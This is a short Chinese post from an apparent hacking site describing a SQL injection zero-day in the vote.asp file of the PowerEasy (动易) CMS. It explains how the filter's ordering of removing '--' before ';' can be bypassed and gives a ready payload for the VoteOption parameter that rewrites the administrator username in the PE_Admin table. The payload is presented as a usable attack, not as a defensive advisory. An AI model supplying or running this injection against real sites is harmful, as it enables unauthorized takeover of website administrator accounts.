动易27个0day之一：vote.asp注入 - 华夏黑客同盟

服务导航

我要发布

您现在的位置：华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文

动易的27个0day之一

★★★

【字体：小大】

动易27个0day之一：vote.asp注入

本来动易只看到了26个。
但是现在外面竟然流传了一个我没发现的，痛苦中。
竟然连这么简单的漏洞都没发现。
今天听到这个文件有问题。

拿到组件调试一下：

以下是一些细节。
VoteOption参数注入(其他的参数就没看了)
他们先过滤了"--"再过滤";"

测试方法：
VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时，修改管理员的用户名。

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913